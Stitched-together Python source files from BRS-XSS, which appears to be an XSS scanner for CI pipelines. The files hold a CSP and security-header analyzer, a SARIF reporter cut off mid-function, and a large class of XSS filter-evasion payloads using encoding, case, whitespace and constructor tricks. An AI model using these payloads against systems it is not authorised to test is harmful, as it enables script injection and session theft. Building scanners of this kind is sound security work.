            if detected_wafs:
                waf_names = ', '.join([waf.waf_type.value for waf in detected_wafs])
                console.print(f"[yellow]WAF detected: {waf_names}[/yellow]")
            
    except KeyboardInterrupt:
        console.print("\nScan interrupted by user")
        raise typer.Exit(130)
        
    except typer.Exit as e:
        # Propagate intended exit codes from above branches (e.g., 0 or 2)
        raise e
    except Exception as e:
        logger.error(f"Unknown error: {str(e)}")
        raise typer.Exit(1)


# Create typer app for this command
app = typer.Typer()
app.command()(scan_command)


#!/usr/bin/env python3

"""
Project: BRS-XSS
Company: EasyProTech LLC (www.easypro.tech)
Dev: Brabus
Date: 2025-10-10 17:31:53 UTC+3
Status: Refactored
Telegram: https://t.me/easyprotech

URL/URI Context - Description
"""

TITLE = "Cross-Site Scripting (XSS) in URL/URI Context"

DESCRIPTION = """
User input is reflected within a URL, typically in href, src, action, formaction, or data attributes. 
This enables protocol-based attacks and is particularly dangerous because users may be socially engineered 
to click malicious links. Modern browsers have improved protection, but many bypass techniques exist, 
especially in mobile browsers, WebViews, and legacy systems.

VULNERABILITY CONTEXT:
Occurs when URLs contain user-controlled data:
- <a href="USER_INPUT">Link</a>
- <img src="USER_INPUT">
- <iframe src="USER_INPUT">
- <script src="USER_INPUT">
- <link href="USER_INPUT">
- <form action="USER_INPUT">
- <button formaction="USER_INPUT">
- <video src="USER_INPUT">
- <audio src="USER_INPUT">
- <embed src="USER_INPUT">
- <object data="USER_INPUT">
- <base href="USER_INPUT">
- <meta content="url=USER_INPUT">
- window.location = USER_INPUT
- window.open(USER_INPUT)

Common in:
- Redirect parameters (?redirect=URL)
- OAuth callbacks (?callback_url=URL)
- File downloads (?file=URL)
- Image galleries (?image=URL)
- RSS feed URLs
- Social media share links
- Email verification links
- Password reset links
- Deep link handlers
- Mobile app WebViews
- Browser extensions
- PDF viewers with URL parameters

SEVERITY: HIGH to CRITICAL
URL-based XSS can lead to phishing, session hijacking, and arbitrary code execution.
Social engineering makes this vector particularly effective.
"""




#!/usr/bin/env python3

"""
BRS-XSS CSP Analyzer

Specialized Content Security Policy analysis module.

Company: EasyProTech LLC (www.easypro.tech)
Dev: Brabus
Created: Tue 05 Aug 2025 18:03:16 MSK
Telegram: https://t.me/EasyProTech
"""

from typing import List
from .header_types import HeaderAnalysis, CSPAnalysis, SecurityLevel

from ..utils.logger import Logger

logger = Logger("core.csp_analyzer")


class CSPAnalyzer:
    """
    Specialized CSP (Content Security Policy) analyzer.
    
    Analyzes:
    - CSP directives and sources
    - Unsafe keywords detection
    - Bypass opportunities
    - Security level assessment
    """
    
    def __init__(self):
        """Initialize CSP analyzer"""
        self.dangerous_keywords = [
            'unsafe-inline', 'unsafe-eval', 'data:', '*', 'blob:',
            'unsafe-hashes', 'strict-dynamic'
        ]
        
        logger.debug("CSP analyzer initialized")
    
    def analyze_csp(self, csp_value: str) -> HeaderAnalysis:
        """Analyze Content Security Policy header"""
        
        if not csp_value or csp_value == "MISSING":
            return HeaderAnalysis(
                header_name="Content-Security-Policy",
                value="MISSING",
                security_level=SecurityLevel.VULNERABLE,
                vulnerabilities=["No CSP header present - XSS attacks unrestricted"],
                recommendations=["Implement Content-Security-Policy header"]
            )
        
        vulnerabilities: List[str] = []
        bypass_techniques = []
        
        # Check for dangerous directives
        if 'unsafe-inline' in csp_value:
            vulnerabilities.append("'unsafe-inline' allows inline scripts and styles")
            bypass_techniques.append("Inject inline <script> tags or event handlers")
        
        if 'unsafe-eval' in csp_value:
            vulnerabilities.append("'unsafe-eval' allows eval() and similar functions")
            bypass_techniques.append("Use eval(), setTimeout(), setInterval() with strings")
        
        if "'*'" in csp_value or csp_value.count('*') > 0:
            vulnerabilities.append("Wildcard (*) allows any source")
            bypass_techniques.append("Load scripts from any external domain")
        
        if 'data:' in csp_value:
            vulnerabilities.append("'data:' scheme allows data URLs")
            bypass_techniques.append("Use data: URLs for script injection")
        
        # Check for missing critical directives
        critical_directives = ['script-src', 'object-src', 'default-src']
        missing_directives = [d for d in critical_directives if d not in csp_value]
        if missing_directives:
            vulnerabilities.append(f"Missing critical directives: {', '.join(missing_directives)}")
        
        # Determine security level
        if len(vulnerabilities) == 0:
            level = SecurityLevel.SECURE
        elif len(vulnerabilities) <= 2:
            level = SecurityLevel.MODERATE
        else:
            level = SecurityLevel.VULNERABLE
        
        recommendations = [
            "Remove 'unsafe-inline' and 'unsafe-eval'",
            "Use nonce or hash-based CSP for inline content",
            "Restrict script sources to trusted domains only",
            "Add 'object-src none' to prevent plugin injection"
        ]
        
        return HeaderAnalysis(
            header_name="Content-Security-Policy",
            value=csp_value,
            security_level=level,
            vulnerabilities=vulnerabilities,
            recommendations=recommendations,
            bypass_techniques=bypass_techniques
        )
    
    def analyze_csp_detailed(self, csp_policy: str) -> CSPAnalysis:
        """Detailed CSP analysis with directive breakdown"""
        
        directives = {}
        policy_parts = [part.strip() for part in csp_policy.split(';') if part.strip()]
        
        for part in policy_parts:
            if ' ' in part:
                directive, sources = part.split(' ', 1)
                directives[directive] = sources.split()
            else:
                directives[part] = []
        
        vulnerabilities: List[str] = []
        bypass_opportunities = []
        unsafe_sources = []
        
        # Analyze each directive
        for directive, sources in directives.items():  # type: ignore[assignment]
            for source in sources:
                if source in self.dangerous_keywords:
                    unsafe_sources.append(f"{directive}: {source}")
                    
                    if source == 'unsafe-inline':
                        bypass_opportunities.append(f"Inline injection via {directive}")
                    elif source == 'unsafe-eval':
                        bypass_opportunities.append(f"eval() injection via {directive}")
                    elif source == '*':
                        bypass_opportunities.append(f"External resource injection via {directive}")
        
        # Determine overall security level
        if len(unsafe_sources) == 0:
            security_level = SecurityLevel.SECURE
        elif len(unsafe_sources) <= 2:
            security_level = SecurityLevel.MODERATE
        else:
            security_level = SecurityLevel.VULNERABLE
        
        return CSPAnalysis(
            policy=csp_policy,
            directives=directives,
            security_level=security_level,
            vulnerabilities=vulnerabilities,
            bypass_opportunities=bypass_opportunities,
            unsafe_sources=unsafe_sources
        )
    
    def find_csp_bypasses(self, csp_policy: str) -> List[str]:
        """Find potential CSP bypass techniques"""
        
        bypasses = []
        policy_lower = csp_policy.lower()
        
        # Check for common bypass patterns
        if 'unsafe-inline' in policy_lower:
            bypasses.append("Inline script/style injection")
        
        if 'unsafe-eval' in policy_lower:
            bypasses.append("eval() based injection")
        
        if 'data:' in policy_lower:
            bypasses.append("Data URI injection")
        
        if "'self'" in policy_lower and 'jsonp' not in policy_lower:
            bypasses.append("JSONP callback injection if available")
        
        # Check for wildcard subdomains
        if '*.example.com' in policy_lower:
            bypasses.append("Subdomain takeover potential")
        
        # Check for weak sources
        weak_sources = ['http:', 'https:', 'ws:', 'wss:']
        for source in weak_sources:
            if source in policy_lower:
                bypasses.append(f"Broad {source} scheme allows many sources")
        
        return bypasses


#!/usr/bin/env python3

"""
Filter Evasion XSS Payloads

Payloads designed to bypass input filters and sanitization.

Company: EasyProTech LLC (www.easypro.tech)
Dev: Brabus
Created: Вс 10 авг 2025 19:35:00 MSK
Telegram: https://t.me/EasyProTech
"""

from typing import List


class FilterEvasionPayloads:
    """Filter evasion XSS payload collection"""
    
    @staticmethod
    def get_keyword_filter_bypass() -> List[str]:
        """Bypass keyword-based filters"""
        return [
            # Case variations
            '<ScRiPt>alert(1)</ScRiPt>',
            '<SCRIPT>alert(1)</SCRIPT>',
            '<Script>AleRt(1)</Script>',
            '<ScRiPt>AlErT(1)</ScRiPt>',
            
            # Character insertion
            '<scr<script>ipt>alert(1)</scr</script>ipt>',
            '<script>/**/alert(1)</script>',
            '<script>alert/**/("1")</script>',
            '<script>alert(/**/"1")</script>',
            
            # Alternative syntax
            '<svg onload=alert(1)>',
            '<img src=x onerror=alert(1)>',
            '<iframe src=javascript:alert(1)>',
            '<body onload=alert(1)>',
            '<marquee onstart=alert(1)>',
            '<details open ontoggle=alert(1)>',
            
            # String concatenation
            '<script>eval("ale"+"rt(1)")</script>',
            '<script>window["ale"+"rt"](1)</script>',
            '<script>this["ale"+"rt"](1)</script>',
            '<script>self["ale"+"rt"](1)</script>',
            
            # Function alternatives
            '<script>prompt(1)</script>',
            '<script>confirm(1)</script>',
            '<script>console.log(1)</script>',
            '<script>console.error(1)</script>',
            
            # Constructor manipulation
            '<script>[].constructor.constructor("alert(1)")()</script>',
            '<script>({}).constructor.constructor("alert(1)")()</script>',
            '<script>Function("alert(1)")()</script>',
        ]
    
    @staticmethod
    def get_tag_filter_bypass() -> List[str]:
        """Bypass HTML tag filters"""
        return [
            # Unclosed tags
            '<script>alert(1)',
            '<script>alert(1)//</script>',
            '<script>alert(1)/*</script>',
            
            # Malformed tags
            '<<script>alert(1)</script>',
            '<script<script>alert(1)</script>',
            '<script>alert(1)<</script>/script>',
            
            # Alternative tags
            '<svg onload=alert(1)>',
            '<math><mtext><script>alert(1)</script></mtext></math>',
            '<foreignObject><script>alert(1)</script></foreignObject>',
            
            # Data attributes
            '<div data-x="&lt;script&gt;alert(1)&lt;/script&gt;" onclick="eval(this.dataset.x.replace(/&lt;/g,'<').replace(/&gt;/g,'>'))">',  # type: ignore[list-item]
            
            # Form elements
            '<form action="javascript:alert(1)"><input type=submit>',
            '<button formaction="javascript:alert(1)">',
            '<input type="image" formaction="javascript:alert(1)">',
            
            # CSS injection
            '<style>@import"javascript:alert(1)";</style>',
            '<style>body{background:url("javascript:alert(1)")}</style>',
            '<link rel="stylesheet" href="javascript:alert(1)">',
            
            # Meta tag refresh
            '<meta http-equiv="refresh" content="0;url=javascript:alert(1)">',
            '<meta http-equiv="refresh" content="0;url=data:text/html,<script>alert(1)</script>">',
        ]
    
    @staticmethod
    def get_attribute_filter_bypass() -> List[str]:
        """Bypass attribute-based filters"""
        return [
            # Event handler variations
            '<img src=x onerror=alert(1)>',
            '<img src=x OnError=alert(1)>',
            '<img src=x ONERROR=alert(1)>',
            '<img src=x onError=alert(1)>',
            
            # Space variations
            '<img src=x onerror=alert(1)>',
            '<img src=x onerror =alert(1)>',
            '<img src=x onerror= alert(1)>',
            '<img src=x onerror = alert(1)>',
            
            # Quote variations
            '<img src=x onerror="alert(1)">',
            '<img src=x onerror=\'alert(1)\'>',
            '<img src=x onerror=`alert(1)`>',
            '<img src=x onerror=alert(1)>',
            
            # Encoded attributes
            '<img src=x o&#110;error=alert(1)>',
            '<img src=x on&#101;rror=alert(1)>',
            '<img src=x &#111;nerror=alert(1)>',
            
            # Alternative events
            '<img src=x onload=alert(1)>',
            '<img src=x onabort=alert(1)>',
            '<img src=x oninvalid=alert(1)>',
            '<input onfocus=alert(1) autofocus>',
            '<select onfocus=alert(1) autofocus>',
            '<textarea onfocus=alert(1) autofocus>',
            
            # Data URLs
            '<img src="data:image/svg+xml,<svg onload=alert(1)>">',
            '<object data="data:text/html,<script>alert(1)</script>">',
            '<embed src="data:text/html,<script>alert(1)</script>">',
        ]
    
    @staticmethod
    def get_encoding_bypass() -> List[str]:
        """Bypass encoding-based filters"""
        return [
            # HTML entities
            '&lt;script&gt;alert(1)&lt;/script&gt;',
            '&#60;script&#62;alert(1)&#60;/script&#62;',
            '&#x3C;script&#x3E;alert(1)&#x3C;/script&#x3E;',
            '&LT;script&GT;alert(1)&LT;/script&GT;',
            
            # URL encoding
            '%3Cscript%3Ealert(1)%3C/script%3E',
            '%3cscript%3ealert(1)%3c/script%3e',
            '%3CSCRIPT%3EALERT(1)%3C/SCRIPT%3E',
            
            # Double URL encoding
            '%253Cscript%253Ealert(1)%253C/script%253E',
            '%2527%253E%253Cscript%253Ealert(1)%253C/script%253E',
            
            # Unicode encoding
            '\\u003Cscript\\u003Ealert(1)\\u003C/script\\u003E',
            '\\x3Cscript\\x3Ealert(1)\\x3C/script\\x3E',
            '\\74script\\76alert(1)\\74/script\\76',
            
            # UTF-8 encoding
            'пїЅpїЅscriptпїЅпїЅalert(1)пїЅпїЅ/scriptпїЅпїЅ',
            '%C0%BCscript%C0%BEalert(1)%C0%BC/script%C0%BE',
            
            # Mixed encoding
            '%3Cscr&#105;pt%3Ealert(1)%3C/scr&#105;pt%3E',
            '&lt;scr%69pt&gt;alert(1)&lt;/scr%69pt&gt;',
            '&#60;scr\\x69pt&#62;alert(1)&#60;/scr\\x69pt&#62;',
        ]
    
    @staticmethod
    def get_whitespace_bypass() -> List[str]:
        """Bypass whitespace-based filters"""
        return [
            # Various whitespace chars
            '<script\x09>alert(1)</script>',  # Tab
            '<script\x0A>alert(1)</script>',  # Line Feed
            '<script\x0B>alert(1)</script>',  # Vertical Tab
            '<script\x0C>alert(1)</script>',  # Form Feed
            '<script\x0D>alert(1)</script>',  # Carriage Return
            '<script\x20>alert(1)</script>',  # Space
            
            # Unicode whitespace
            '<script\u2000>alert(1)</script>',  # En Quad
            '<script\u2001>alert(1)</script>',  # Em Quad
            '<script\u2002>alert(1)</script>',  # En Space
            '<script\u2003>alert(1)</script>',  # Em Space
            '<script\u2004>alert(1)</script>',  # Three-Per-Em Space
            '<script\u2005>alert(1)</script>',  # Four-Per-Em Space
            '<script\u2006>alert(1)</script>',  # Six-Per-Em Space
            '<script\u2007>alert(1)</script>',  # Figure Space
            '<script\u2008>alert(1)</script>',  # Punctuation Space
            '<script\u2009>alert(1)</script>',  # Thin Space
            '<script\u200A>alert(1)</script>',  # Hair Space
            '<script\u200B>alert(1)</script>',  # Zero Width Space
            '<script\u3000>alert(1)</script>',  # Ideographic Space
            
            # Multiple whitespace
            '<script\x20\x09\x0A>alert(1)</script>',
            '<script\x20\x20\x20>alert(1)</script>',
            '<script\t\t\t>alert(1)</script>',
            
            # No whitespace
            '<script>alert(1)</script>',
            '<img/src=x/onerror=alert(1)>',
            '<svg/onload=alert(1)>',
        ]
    
    @staticmethod
    def get_parentheses_bypass() -> List[str]:
        """Bypass parentheses filters"""
        return [
            # Template literals
            '<script>alert`1`</script>',
            '<script>eval`alert\\`1\\``</script>',
            '<script>Function`alert\\`1\\```</script>',
            '<script>setTimeout`alert\\`1\\``,1`</script>',
            
            # Array access
            '<script>alert[String.fromCharCode(49)]</script>',
            '<script>window[atob("YWxlcnQ=")][1]</script>',
            
            # Indirect calls
            '<script>setTimeout(alert,1,1)</script>',
            '<script>setInterval(alert,1,1)</script>',
            '<script>requestAnimationFrame(alert.bind(null,1))</script>',
            
            # Constructor access
            '<script>[].constructor.constructor`alert\\`1\\```</script>',
            '<script>Object.constructor.constructor`alert\\`1\\```</script>',
            
            # Event handlers without parentheses
            '<img src=x onerror=alert`1`>',
            '<svg onload=alert`1`>',
            '<iframe onload=alert`1`>',
            
            # Throw expressions
            '<script>throw alert(1)</script>',
            '<script>void alert(1)</script>',
            '<script>delete alert(1)</script>',
            '<script>typeof alert(1)</script>',
        ]
    
    @staticmethod
    def get_quotes_bypass() -> List[str]:
        """Bypass quote filters"""
        return [
            # No quotes
            '<script>alert(1)</script>',
            '<script>alert(String.fromCharCode(88,83,83))</script>',
            '<img src=x onerror=alert(1)>',
            '<svg onload=alert(1)>',
            
            # String.fromCharCode
            '<script>alert(String.fromCharCode(49))</script>',
            '<script>eval(String.fromCharCode(97,108,101,114,116,40,49,41))</script>',
            
            # Hex encoding
            '<script>alert(\\x31)</script>',
            '<script>eval(\\x61\\x6C\\x65\\x72\\x74\\x28\\x31\\x29)</script>',
            
            # Unicode encoding
            '<script>alert(\\u0031)</script>',
            '<script>eval(\\u0061\\u006C\\u0065\\u0072\\u0074\\u0028\\u0031\\u0029)</script>',
            
            # Octal encoding
            '<script>alert(\\61)</script>',
            '<script>eval(\\141\\154\\145\\162\\164\\50\\61\\51)</script>',
            
            # Template literals
            '<script>alert`1`</script>',
            '<script>eval`alert\\`1\\``</script>',
            
            # Alternative delimiters
            '<img src=x onerror=alert(1)>',
            '<img src="x" onerror=alert(1)>',
            '<img src=\'x\' onerror=alert(1)>',
            '<img src=`x` onerror=alert(1)>',
        ]
    
    @staticmethod
    def get_all() -> List[str]:
        """Get all filter evasion XSS payloads"""
        payloads = []
        payloads.extend(FilterEvasionPayloads.get_keyword_filter_bypass())
        payloads.extend(FilterEvasionPayloads.get_tag_filter_bypass())
        payloads.extend(FilterEvasionPayloads.get_attribute_filter_bypass())
        payloads.extend(FilterEvasionPayloads.get_encoding_bypass())
        payloads.extend(FilterEvasionPayloads.get_whitespace_bypass())
        payloads.extend(FilterEvasionPayloads.get_parentheses_bypass())
        payloads.extend(FilterEvasionPayloads.get_quotes_bypass())
        return payloads


#!/usr/bin/env python3

"""
Project: BRS-XSS (XSS Detection Suite)
Company: EasyProTech LLC (www.easypro.tech)
Dev: Brabus
Date: Sun 10 Aug 2025 22:36:10 MSK
Status: Created
Telegram: https://t.me/EasyProTech
"""

import os
import re
import tempfile
from pathlib import Path


def sanitize_filename(name: str, max_len: int = 128) -> str:
    """Sanitize a string to be a safe filename."""
    name = name.replace('https://', '').replace('http://', '')
    name = re.sub(r"/+", "_", name)
    name = re.sub(r"[^\w\-_.]", "_", name)
    name = re.sub(r"_{2,}", "_", name).strip("._-")
    if len(name) > max_len:
        name = name[:max_len].rstrip("._-")
    return name or "report"


def ensure_dir(path: str) -> None:
    Path(path).mkdir(parents=True, exist_ok=True)


def atomic_write(file_path: str, content: str, mode: str = "w", encoding: str = "utf-8") -> None:
    """Write to a temp file and atomically replace the target file."""
    target = Path(file_path)
    ensure_dir(str(target.parent))
    fd, tmp_path = tempfile.mkstemp(prefix=target.stem + "_", suffix=target.suffix, dir=str(target.parent))
    try:
        with os.fdopen(fd, mode, encoding=encoding) as f:
            f.write(content)
        os.replace(tmp_path, file_path)
    finally:
        try:
            if os.path.exists(tmp_path):
                os.remove(tmp_path)
        except Exception:
            pass


def build_result_path(base_dir: str, filename: str, ext: str) -> str:
    ensure_dir(base_dir)
    safe_name = sanitize_filename(filename)
    return str(Path(base_dir) / f"{safe_name}{ext}")





#!/usr/bin/env python3

"""
BRS-XSS Basic Headers Analyzer

Analyzer for basic security headers (non-CSP).

Company: EasyProTech LLC (www.easypro.tech)
Dev: Brabus
Created: Tue 05 Aug 2025 18:03:16 MSK
Telegram: https://t.me/EasyProTech
"""

import re
from typing import Optional
from .header_types import HeaderAnalysis, SecurityLevel

from ..utils.logger import Logger

logger = Logger("core.basic_headers_analyzer")


class BasicHeadersAnalyzer:
    """
    Analyzer for basic security headers.
    
    Handles:
    - X-XSS-Protection
    - X-Frame-Options
    - X-Content-Type-Options
    - Referrer-Policy
    - Strict-Transport-Security
    """
    
    def __init__(self):
        """Initialize basic headers analyzer"""
        logger.debug("Basic headers analyzer initialized")
    
    def analyze_xss_protection(self, value: Optional[str]) -> HeaderAnalysis:
        """Analyze X-XSS-Protection header"""
        
        if not value:
            return HeaderAnalysis(
                header_name="X-XSS-Protection",
                value="MISSING",
                security_level=SecurityLevel.WEAK,
                vulnerabilities=["No XSS protection header"],
                recommendations=["Add 'X-XSS-Protection: 1; mode=block'"]
            )
        
        vulnerabilities = []
        bypass_techniques = []
        
        if value == "0":
            vulnerabilities.append("XSS protection explicitly disabled")
            bypass_techniques.append("Standard reflected XSS attacks will work")
            level = SecurityLevel.VULNERABLE
        elif "mode=block" not in value:
            vulnerabilities.append("XSS filter not set to block mode")
            bypass_techniques.append("XSS may still execute with sanitization attempts")
            level = SecurityLevel.WEAK
        else:
            level = SecurityLevel.MODERATE
        
        return HeaderAnalysis(
            header_name="X-XSS-Protection",
            value=value,
            security_level=level,
            vulnerabilities=vulnerabilities,
            recommendations=["Use 'X-XSS-Protection: 1; mode=block' for maximum protection"],
            bypass_techniques=bypass_techniques
        )
    
    def analyze_frame_options(self, value: Optional[str]) -> HeaderAnalysis:
        """Analyze X-Frame-Options header"""
        
        if not value:
            return HeaderAnalysis(
                header_name="X-Frame-Options",
                value="MISSING",
                security_level=SecurityLevel.WEAK,
                vulnerabilities=["No frame protection - vulnerable to clickjacking"],
                recommendations=["Add 'X-Frame-Options: DENY' or 'SAMEORIGIN'"]
            )
        
        vulnerabilities = []
        bypass_techniques = []
        
        if value.upper() == "ALLOWALL":
            vulnerabilities.append("Allows framing from any origin")
            bypass_techniques.append("Clickjacking attacks via iframe embedding")
            level = SecurityLevel.VULNERABLE
        elif value.upper() == "SAMEORIGIN":
            level = SecurityLevel.MODERATE
        elif value.upper() == "DENY":
            level = SecurityLevel.SECURE
        else:
            vulnerabilities.append("Invalid or unrecognized value")
            level = SecurityLevel.WEAK
        
        return HeaderAnalysis(
            header_name="X-Frame-Options",
            value=value,
            security_level=level,
            vulnerabilities=vulnerabilities,
            recommendations=["Use 'DENY' for maximum protection"],
            bypass_techniques=bypass_techniques
        )
    
    def analyze_content_type_options(self, value: Optional[str]) -> HeaderAnalysis:
        """Analyze X-Content-Type-Options header"""
        
        if not value:
            return HeaderAnalysis(
                header_name="X-Content-Type-Options",
                value="MISSING",
                security_level=SecurityLevel.WEAK,
                vulnerabilities=["No MIME type protection - vulnerable to MIME sniffing"],
                recommendations=["Add 'X-Content-Type-Options: nosniff'"]
            )
        
        if value.lower() == "nosniff":
            level = SecurityLevel.SECURE
            vulnerabilities = []
        else:
            level = SecurityLevel.WEAK
            vulnerabilities = ["Invalid value - MIME sniffing may occur"]
        
        return HeaderAnalysis(
            header_name="X-Content-Type-Options",
            value=value,
            security_level=level,
            vulnerabilities=vulnerabilities,
            recommendations=["Use 'nosniff' value"]
        )
    
    def analyze_referrer_policy(self, value: Optional[str]) -> Optional[HeaderAnalysis]:
        """Analyze Referrer-Policy header"""
        
        if not value:
            return None  # Not critical for XSS, skip if missing
        
        secure_policies = ['no-referrer', 'same-origin', 'strict-origin']
        weak_policies = ['unsafe-url', 'origin-when-cross-origin']
        
        if value in secure_policies:
            level = SecurityLevel.SECURE
            vulnerabilities = []
        elif value in weak_policies:
            level = SecurityLevel.WEAK
            vulnerabilities = ["May leak sensitive information in referrer"]
        else:
            level = SecurityLevel.MODERATE
            vulnerabilities = []
        
        return HeaderAnalysis(
            header_name="Referrer-Policy",
            value=value,
            security_level=level,
            vulnerabilities=vulnerabilities,
            recommendations=["Use 'no-referrer' or 'same-origin' for better privacy"]
        )
    
    def analyze_hsts(self, value: Optional[str]) -> Optional[HeaderAnalysis]:
        """Analyze Strict-Transport-Security header"""
        
        if not value:
            return None  # Not critical for XSS analysis
        
        vulnerabilities = []
        
        # Check max-age
        if 'max-age=' not in value:
            vulnerabilities.append("Missing max-age directive")
        else:
            max_age_match = re.search(r'max-age=(\d+)', value)
            if max_age_match:
                max_age = int(max_age_match.group(1))
                if max_age < 31536000:  # 1 year
                    vulnerabilities.append("HSTS max-age too short (< 1 year)")
        
        # Check for includeSubDomains
        if 'includeSubDomains' not in value:
            vulnerabilities.append("Missing includeSubDomains directive")
        
        level = SecurityLevel.SECURE if not vulnerabilities else SecurityLevel.MODERATE
        
        return HeaderAnalysis(
            header_name="Strict-Transport-Security",
            value=value,
            security_level=level,
            vulnerabilities=vulnerabilities,
            recommendations=["Use max-age=31536000; includeSubDomains; preload"]
        )


# Project: BRS-XSS (XSS Detection Suite)
# Company: EasyProTech LLC (www.easypro.tech)
# Dev: Brabus
# Date: Wed 04 Sep 2025 09:03:08 MSK
# Status: Created
# Telegram: https://t.me/EasyProTech

"""
SARIF 2.1.0 compliant reporter for GitHub Code Scanning integration
"""

import json
from datetime import datetime, timezone
from typing import Dict, List, Any
from urllib.parse import urlparse

from .data_models import VulnerabilityData


class SARIFReporter:
    """Generate SARIF 2.1.0 compliant reports for security tools integration"""
    
    def __init__(self):
        from .. import __version__
        self.version = __version__
        self.tool_name = "BRS-XSS"
        self.vendor = "EasyProTech LLC"
        
    def generate_sarif(self, vulnerabilities: List[VulnerabilityData], 
                      scan_info: Dict[str, Any]) -> Dict[str, Any]:
        """Generate complete SARIF 2.1.0 report"""
        
        sarif_report = {
            "version": "2.1.0",
            "$schema": "https://json.schemastore.org/sarif-2.1.0.json",
            "runs": [
                {
                    "tool": self._build_tool_info(),
                    "invocation": self._build_invocation(scan_info),
                    "artifacts": self._build_artifacts(vulnerabilities),
                    "results": self._build_results(vulnerabilities),
                    "taxonomies": [self._build_taxonomy()],
                    "properties": {
                        "scan_statistics": {
                            "targets_scanned": scan_info.get("targets_scanned", 0),
                            "vulnerabilities_found": len(vulnerabilities),
                            "scan_duration": scan_info.get("duration", "unknown"),
                            "false_positive_rate": scan_info.get("false_positive_rate", "unknown")
                        }
                    }
                }
            ]
        }
        
        return sarif_report
    
    def _build_tool_info(self) -> Dict[str, Any]:
        """Build SARIF tool information section"""
        return {
            "driver": {
                "name": self.tool_name,
                "version": self.version,
                "semanticVersion": self.version,
                "informationUri": "https://github.com/EPTLLC/brs-xss",
                "organization": self.vendor,
                "shortDescription": {
                    "text": "Context-aware async XSS scanner for CI"
                },
                "fullDescription": {
                    "text": "BRS-XSS scanner with context detection, async performance, and multi-format reporting."
                },
                "rules": self._build_rules(),
                "supportedTaxonomies": [
                    {
                        "name": "CWE",
                        "index": 0,
                        "guid": "25F72D7E-8A92-459D-B67A-64B6F3C2F1B4"
                    }
                ]
            }
        }
    
    def _build_rules(self) -> List[Dict[str, Any]]:
        """Build SARIF rules for different XSS types"""
        return [
            {
                "id": "XSS001",
                "name": "ReflectedXSS",
                "shortDescription": {"text": "Reflected Cross-Site Scripting"},
                "fullDescription": {
                    "text": "User input is reflected in the response without proper sanitization, allowing script injection."
                },
                "help": {"text": "Sanitize user input and encode output appropriately. See CWE-79."},
                "helpUri": "https://cwe.mitre.org/data/definitions/79.html",
                "messageStrings": {
                    "default": {
                        "text": "Reflected XSS vulnerability detected in parameter '{0}' with payload '{1}'"
                    }
                },
                "defaultConfiguration": {"level": "error"},
                "properties": {
                    "security-severity": "8.8",
                    "precision": "high",
                    "tags": ["security", "external/cwe/cwe-79"]
                },
                "relationships": [
                    {
                        "target": {
                            "id": "79",
                            "index": 0,
                            "toolComponent": {
                                "name": "CWE",
                                "index": 0
                            }
                        },
                        "kinds": ["superset"]
                    }
                ]
            },
            {
                "id": "XSS002",
                "name": "StoredXSS",
                "shortDescription": {"text": "Stored Cross-Site Scripting"},
                "fullDescription": {
                    "text": "User input is stored and later displayed without proper sanitization, allowing persistent script injection."
                },
                "help": {"text": "Validate and sanitize stored user input. Apply output encoding. See CWE-79."},
                "helpUri": "https://cwe.mitre.org/data/definitions/79.html",
                "messageStrings": {
                    "default": {
                        "text": "Stored XSS vulnerability detected in parameter '{0}' with payload '{1}'"
                    }
                },
                "defaultConfiguration": {"level": "error"},
                "properties": {
                    "security-severity": "9.0",
                    "precision": "high",
                    "tags": ["security", "external/cwe/cwe-79"]
                }
            },
            {
                "id": "XSS003",
                "name": "DOMXSS",
                "shortDescription": {"text": "DOM-based Cross-Site Scripting"},
                "fullDescription": {
                    "text": "Client-side JavaScript processes user input unsafely, allowing script injection through DOM manipulation."
                },
                "help": {"text": "Avoid using untrusted input in DOM sinks. Use safe APIs. See CWE-79."},
                "helpUri": "https://cwe.mitre.org/data/definitions/79.html",
                "messageStrings": {
                    "default": {
                        "text": "DOM XSS vulnerability detected with source '{0}' and sink '{1}'"
                    }
                },
                "defaultConfiguration": {"level": "error"},
                "properties": {
                    "security-severity": "8.5",
                    "precision": "medium",
                    "tags": ["security", "external/cwe/cwe-79", "dom"]
                }
            }
        ]
    
    def _build_invocation(self, scan_info: Dict[str, Any]) -> Dict[str, Any]:
        """Build SARIF invocation information"""
        return {
            "executionSuccessful": True,
            "startTimeUtc": scan_info.get("start_time", datetime.now(timezone.utc).isoformat()),
            "endTimeUtc": scan_info.get("end_time", datetime.now(timezone.utc).isoformat()),
            "machine": scan_info.get("machine", "unknown"),
            "commandLine": scan_info.get("command_line", "brs-xss scan"),
            "workingDirectory": {
                "uri": scan_info.get("working_directory", "file:///")
            }
        }
    
    def _build_artifacts(self, vulnerabilities: List[VulnerabilityData]) -> List[Dict[str, Any]]:
        """Build SARIF artifacts (scanned URLs)"""
        artifacts = []
        seen_urls = set()
        
        for vuln in vulnerabilities:
            parsed_url = urlparse(vuln.url)
            base_url = f"{parsed_url.scheme}://{parsed_url.netloc}{parsed_url.path}"
            
            if base_url not in seen_urls:
                artifacts.append({
                    "location": {
                        "uri": base_url
                    },
                    "mimeType": "text/html",
                    "properties": {
                        "scanned": True,
                        "parameters": parsed_url.query
                    }
                })
                seen_urls.add(base_url)
        
        return artifacts
    
    def _build_results(self, vulnerabilities: List[VulnerabilityData]) -> List[Dict[str, Any]]:
        """Build SARIF results from vulnerabilities"""
        results: List[Dict[str, Any]] = []
        for vuln in vulnerabilities:
            rule_id = self._get_rule_id(vuln)
            result: Dict[str, Any] = {
                "ruleId": rule_id,
                "ruleIndex": self._get_rule_index(rule_id),
                "message": {
                    "id": "default",
                    "arguments": [
                        vuln.parameter or "unknown",
                        vuln.payload[:100] + "..." if len(vuln.payload) > 100 else vuln.payload,
                    ],
                },
                "level": self._get_severity_level(vuln.severity),
                "locations": [
                    {
                        "physicalLocation": {
                            "artifactLocation": {"uri": self._get_base_url(vuln.url)},
                            "region": {
                                "startLine": 1,
                                "startColumn": 1,
                                "snippet": {"text": f"Parameter: {vuln.parameter}, Payload: {vuln.payload}"},
                            },
                        },
                        "logicalLocations": [
                            {"name": vuln.parameter or "unknown_parameter", "kind": "parameter"}
                        ],
                    }
                ],
                "partialFingerprints": {
                    "primaryLocationLineHash": str(hash(f"{vuln.url}{vuln.parameter}{vuln.payload}"))[:16]
                },
                "properties": {
                    "confidence": vuln.confidence,
                    "context_type": vuln.context_type,
                    "vulnerability_type": vuln.vulnerability_type,
                    "url": vuln.url,
                    "parameter": vuln.parameter,
                    "payload": vuln.payload,
                    # Optional fields; not all data models include http method
                    "method": getattr(vuln, "method", "unknown"),
                    "scan_engine": vuln.scan_engine,
                },
                "fixes": [
                    {
                        "description": {
                            "text": f"Sanitize input for parameter '{vuln.parameter}' in {vuln.context_type} context"
                        },
